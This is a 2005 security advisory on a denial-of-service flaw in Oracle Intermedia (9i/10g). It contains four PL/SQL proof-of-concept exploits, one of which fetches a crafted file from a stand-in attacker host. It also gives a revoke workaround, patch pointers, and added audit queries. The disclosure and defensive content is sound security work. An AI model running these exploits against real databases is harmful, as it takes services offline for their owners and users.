Denial of Service via Oracle Intermedia in Oracle 9i / 10g
Details

The proof-of-concept exploit code below causes a denial of service: the Oracle process spins and consumes 100% CPU.

Workarounds

    REVOKE EXECUTE ON ORDSYS.ORDIMAGE FROM PUBLIC FORCE;
    REVOKE EXECUTE ON ORDSYS.ORDDOC FROM PUBLIC FORCE;

Example

    -- Exploit 1: Explicitly setting two null bytes to localData property
    DECLARE
      Image1 ORDSYS.ORDImage;
    BEGIN
      Image1 := ORDSYS.ORDImage.init();
      Image1.source.localData := TO_BLOB(HEXTORAW('0000'));
      Image1.setProperties;
    END;
    /

    -- Exploit 2: Load from filesystem
    DECLARE
      Image ORDSYS.ORDImage;
    BEGIN
      Image := ORDSYS.ORDImage.init('file', 'MEDIA_DIR', 'file_with_two_null_bytes.jpg');
      Image.setProperties;
    END;
    /

    -- Exploit 3: Load from web
    DECLARE
      Image ORDSYS.ORDImage;
    BEGIN
      Image := ORDSYS.ORDImage.init('HTTP', 'www.evildba.com/', 'file_with_two_null_bytes.jpg');
      Image.setProperties;
    END;
    /

    -- Exploit 4: Explicitly setting two null bytes to localData property of ORDDoc type.
    DECLARE
      Doc ORDSYS.ORDDoc;
      X RAW(30000);
    BEGIN
      Doc := ORDSYS.ORDDoc.init();
      Doc.source.localData := TO_BLOB(HEXTORAW('0000'));
      Doc.setProperties (X, FALSE);
    END;
    /

Patch Information

Revoke the grants or apply the patches mentioned in Oracle Critical Patch Update April 2005.

© 2005 by Red-Database-Security GmbH - last update 29-april-2005
© 2005 by Red-Database-Security GmbH - last update 02-nov-2005
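To verify the workaround and see what REVOKE ... FORCE touches, the queries below (an added example, not part of the original advisory) list who holds EXECUTE on the two types and which objects outside ORDSYS depend on them. They assume a session that can read the DBA_TAB_PRIVS, DBA_TAB_COLUMNS and DBA_DEPENDENCIES dictionary views.

```sql
-- Added example: audit for the ORDSYS.ORDIMAGE / ORDSYS.ORDDOC workaround.
-- Assumption: the session can query the DBA_* dictionary views.

-- 1. Who can execute the two types?
--    After the workaround, PUBLIC must not appear in this result.
SELECT grantee, owner, table_name, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'ORDSYS'
   AND table_name IN ('ORDIMAGE', 'ORDDOC')
   AND privilege = 'EXECUTE'
 ORDER BY table_name, grantee;

-- 2. Columns declared with either type.
--    REVOKE ... FORCE marks dependent objects INVALID and makes data in
--    dependent tables inaccessible to schemas that lose the privilege,
--    so review this list before running the workaround.
SELECT owner, table_name, column_name, data_type
  FROM dba_tab_columns
 WHERE data_type_owner = 'ORDSYS'
   AND data_type IN ('ORDIMAGE', 'ORDDOC')
 ORDER BY owner, table_name, column_name;

-- 3. Objects outside ORDSYS (tables, types, stored code) that reference
--    the two types and may need revalidation afterwards.
SELECT owner, name, type, referenced_name
  FROM dba_dependencies
 WHERE referenced_owner = 'ORDSYS'
   AND referenced_name IN ('ORDIMAGE', 'ORDDOC')
   AND referenced_type = 'TYPE'
   AND owner <> 'ORDSYS'
 ORDER BY owner, name;
```

Schemas returned by queries 2 or 3 that legitimately use Intermedia need EXECUTE granted to them directly once it has been revoked from PUBLIC.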